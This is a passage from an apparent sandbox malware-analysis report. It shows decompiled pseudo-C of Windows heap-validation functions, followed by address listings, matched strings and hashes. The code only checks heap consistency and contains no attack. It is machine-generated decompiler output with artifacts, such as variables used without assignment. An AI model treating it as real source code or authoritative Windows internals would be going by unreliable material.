							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0166B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0166B150();
					} else {
						E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0171FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0166B150();
						} else {
							E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0166B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0166B150();
									} else {
										E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0166B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0171FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0166B150();
										} else {
											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E016BD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0172A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0168E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0172A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0168E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0168A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0168A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0168BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E017123E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E01661F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                    0x01724af7
                    0x01724afb
                    0x01724afd
                    0x01724b01
                    0x01724b03
                    0x01724b08
                    0x01724b0a
                    0x01724b0f
                    0x01724eb5
                    0x01724eb5
                    0x01724ebb
                    0x017250d5
                    0x017250d8
                    0x01724ff6
                    0x00000000
                    0x01724ff6
                    0x017250de
                    0x017250e4
                    0x017250e8
                    0x01725107
                    0x0172510c
                    0x017250ea
                    0x017250ff
                    0x01725104
                    0x01725112
                    0x01725115
                    0x01725118
                    0x01725119
                    0x017250cb
                    0x017250cb
                    0x017250af
                    0x00000000
                    0x017250af
                    0x01724ecb
                    0x017250b6
                    0x017250bb
                    0x01724ed1
                    0x01724ee6
                    0x01724eeb
                    0x017250c1
                    0x017250c2
                    0x017250c5
                    0x017250c6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01724b15
                    0x01724b15
                    0x01724b1c
                    0x01724b1e
                    0x01724b23
                    0x01724b27
                    0x01724b33
                    0x01724b38
                    0x01724b3a
                    0x01724b3c
                    0x01724b41
                    0x01724b41
                    0x01724b3a
                    0x01724b52
                    0x01725045
                    0x0172504b
                    0x0172504f
                    0x0172506e
                    0x01725073
                    0x01725051
                    0x01725066
                    0x0172506b
                    0x01725083
                    0x01725088
                    0x01725088
                    0x0172508a
                    0x01725091
                    0x01725099
                    0x01725099
                    0x0172509d
                    0x017250a7
                    0x017250ad
                    0x017250ad
                    0x017250ad
                    0x00000000
                    0x0172509d
                    0x01724b58
                    0x01724b5b
                    0x01724b5e
                    0x01724b63
                    0x01724b66
                    0x01724b69
                    0x01724b6f
                    0x01724be4
                    0x01724bf0
                    0x01724bf2
                    0x01724bf5
                    0x01724dc3
                    0x01724dc6
                    0x01724dc9
                    0x01724dce
                    0x01724dce
                    0x01724dd0
                    0x01724dd0
                    0x01724dd5
                    0x01724def
                    0x01724dd7
                    0x01724de7
                    0x01724de7
                    0x01724df3
                    0x01725001
                    0x01725007
                    0x0172500b
                    0x0172502a
                    0x0172502f
                    0x0172500d
                    0x01725022
                    0x01725027
                    0x01725039
                    0x0172503a
                    0x0172503b
                    0x00000000
                    0x01724df9
                    0x01724dfd
                    0x01724e90
                    0x01724e94
                    0x01724e9e
                    0x01724ea4
                    0x01724ea4
                    0x01724ea4
                    0x01724ea6
                    0x01724ea6
                    0x00000000
                    0x01724ea6
                    0x01724e03
                    0x01724e08
                    0x01724f88
                    0x01724f92
                    0x01724f99
                    0x01724f9c
                    0x01724fe0
                    0x01724fe4
                    0x01724fee
                    0x01724ff4
                    0x01724ff4
                    0x01724ff4
                    0x00000000
                    0x01724fe4
                    0x01724f9e
                    0x01724fa4
                    0x01724fa8
                    0x01724fc7
                    0x01724fcc
                    0x01724faa
                    0x01724fbf
                    0x01724fc4
                    0x01724fd2
                    0x01724fd5
                    0x01724fd6
                    0x01724f34
                    0x01724f34
                    0x00000000
                    0x01724f39
                    0x01724e0e
                    0x01724e14
                    0x01724e1b
                    0x01724e25
                    0x01724e2b
                    0x01724e2b
                    0x01724e33
                    0x01724e38
                    0x01724e8a
                    0x01724e8a
                    0x00000000
                    0x01724e3a
                    0x01724e3e
                    0x01724e43
                    0x01724e47
                    0x01724e53
                    0x01724e58
                    0x01724e5a
                    0x01724e5c
                    0x01724e61
                    0x01724e61
                    0x01724e5a
                    0x01724e6e
                    0x01724f41
                    0x01724f47
                    0x01724f4b
                    0x01724f6a
                    0x01724f6f
                    0x01724f4d
                    0x01724f62
                    0x01724f67
                    0x01724f7f
                    0x01724f80
                    0x01724f81
                    0x00000000
                    0x01724e74
                    0x01724e78
                    0x01724e82
                    0x01724e88
                    0x01724e88
                    0x00000000
                    0x01724e78
                    0x01724e6e
                    0x01724e38
                    0x01724df3
                    0x01724bfe
                    0x01724c01
                    0x01724c04
                    0x01724c07
                    0x01724c09
                    0x01724c0c
                    0x01724c0e
                    0x01724c0e
                    0x01724c11
                    0x01724c11
                    0x01724c0c
                    0x01724c14
                    0x01724c17
                    0x01724dae
                    0x01724db2
                    0x01724db7
                    0x01724dba
                    0x01724dbd
                    0x01724ef1
                    0x01724ef7
                    0x01724efb
                    0x01724f1a
                    0x01724f1f
                    0x01724efd
                    0x01724f12
                    0x01724f17
                    0x01724f2b
                    0x01724f2b
                    0x01724f2d
                    0x01724f2e
                    0x01724f2f
                    0x00000000
                    0x01724f2f
                    0x00000000
                    0x01724c1d
                    0x01724c1d
                    0x01724c20
                    0x01724c23
                    0x01724c26
                    0x01724c29
                    0x01724c2c
                    0x01724c2e
                    0x01724d91
                    0x01724d91
                    0x01724d92
                    0x01724d97
                    0x01724d9e
                    0x00000000
                    0x01724d9e
                    0x01724c34
                    0x01724c37
                    0x01724c39
                    0x01724c3c
                    0x00000000
                    0x00000000
                    0x01724c45
                    0x01724c48
                    0x01724c4e
                    0x01724c50
                    0x01724c78
                    0x01724c78
                    0x01724c7b
                    0x01724c7d
                    0x01724c80
                    0x01724c84
                    0x01724cad
                    0x01724cad
                    0x01724cb0
                    0x01724cb8
                    0x01724cbb
                    0x01724cbe
                    0x01724cc1
                    0x01724cc7
                    0x01724cdc
                    0x01724cc9
                    0x01724cd2
                    0x01724cd4
                    0x01724cd4
                    0x01724cde
                    0x01724ce0
                    0x01724d13
                    0x01724d13
                    0x01724d16
                    0x01724d18
                    0x01724d29
                    0x01724d2a
                    0x01724d2c
                    0x01724d34
                    0x01724d1a
                    0x01724d1a
                    0x01724d1a
                    0x01724d1d
                    0x01724d1f
                    0x01724d22
                    0x01724d24
                    0x01724d24
                    0x01724d3c
                    0x01724d3f
                    0x01724d45
                    0x01724d47
                    0x01724d6c
                    0x01724d6c
                    0x01724d70
                    0x01724d7e
                    0x01724d84
                    0x01724d84
                    0x00000000
                    0x01724d49
                    0x01724d49
                    0x01724d56
                    0x01724d56
                    0x01724d59
                    0x00000000
                    0x00000000
                    0x01724d4e
                    0x01724d50
                    0x01724d52
                    0x01724d8e
                    0x01724d5d
                    0x01724d5f
                    0x01724d67
                    0x00000000
                    0x01724d67
                    0x01724d54
                    0x01724d54
                    0x01724d5b
                    0x00000000
                    0x01724d5b
                    0x01724ce2
                    0x01724ce2
                    0x01724ce5
                    0x01724ce5
                    0x01724ce7
                    0x01724cfb
                    0x01724ce9
                    0x01724ce9
                    0x01724cec
                    0x01724cef
                    0x01724cf1
                    0x01724cf3
                    0x01724cf3
                    0x01724cf3
                    0x01724cf6
                    0x01724cf6
                    0x01724d02
                    0x01724d05
                    0x00000000
                    0x00000000
                    0x01724d07
                    0x01724d0f
                    0x01724d11
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01724d11
                    0x00000000
                    0x01724ce5
                    0x01724ce0
                    0x01724c8a
                    0x01724c8f
                    0x01724c91
                    0x00000000
                    0x00000000
                    0x01724c9d
                    0x00000000
                    0x01724c9d
                    0x01724c52
                    0x01724c5f
                    0x01724c5f
                    0x01724c62
                    0x00000000
                    0x00000000
                    0x01724c57
                    0x01724c59
                    0x01724c5b
                    0x01724caa
                    0x01724c66
                    0x01724c68
                    0x01724c70
                    0x01724c75
                    0x00000000
                    0x01724c75
                    0x01724c5d
                    0x01724c5d
                    0x01724c64
                    0x00000000
                    0x01724c64
                    0x01724c17
                    0x01724b75
                    0x01724bc4
                    0x01724bc8
                    0x00000000
                    0x00000000
                    0x01724bd9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01724b77
                    0x01724b7a
                    0x01724b8c
                    0x01724b7c
                    0x01724b7e
                    0x01724b83
                    0x01724b86
                    0x01724b86
                    0x01724b90
                    0x01724b93
                    0x00000000
                    0x00000000
                    0x01724b95
                    0x01724bab
                    0x01724bb0
                    0x00000000
                    0x00000000
                    0x01724bb2
                    0x01724bb9
                    0x00000000
                    0x00000000
                    0x01724bbb
                    0x01724bbe
                    0x01724bc1
                    0x01724bc1
                    0x00000000
                    0x01724bc1
                    0x01724b97
                    0x01724ba4
                    0x00000000
                    0x00000000
                    0x01724ba6
                    0x00000000
                    0x01724ba6
                    0x01724ea9
                    0x01724ea9
                    0x01724eb2
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                    • API String ID: 0-3591852110
                    • Opcode ID: 53d9aa36b8b5899a03e02ba0517595445101e4f828c3f55dc0c834db7613822c
                    • Instruction ID: 3a1ebe64eb620bfe39518dc8583d869805feaccff42d6832e9ccd1544e6903c2
                    • Opcode Fuzzy Hash: 53d9aa36b8b5899a03e02ba0517595445101e4f828c3f55dc0c834db7613822c
                    • Instruction Fuzzy Hash: 3F12CF71600662DFD725CF29C894BB6FBE6EF48704F18845DE9878B641D774E882CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01724496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 56%
                    			E01724496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E017249A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1756378 = _t267;
						asm("int3");
						 *0x1756378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0169174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E0166B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E0166B150();
							} else {
								E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E0166B150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1756350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E016A9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0169174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E0166B150();
										} else {
											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E0166B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
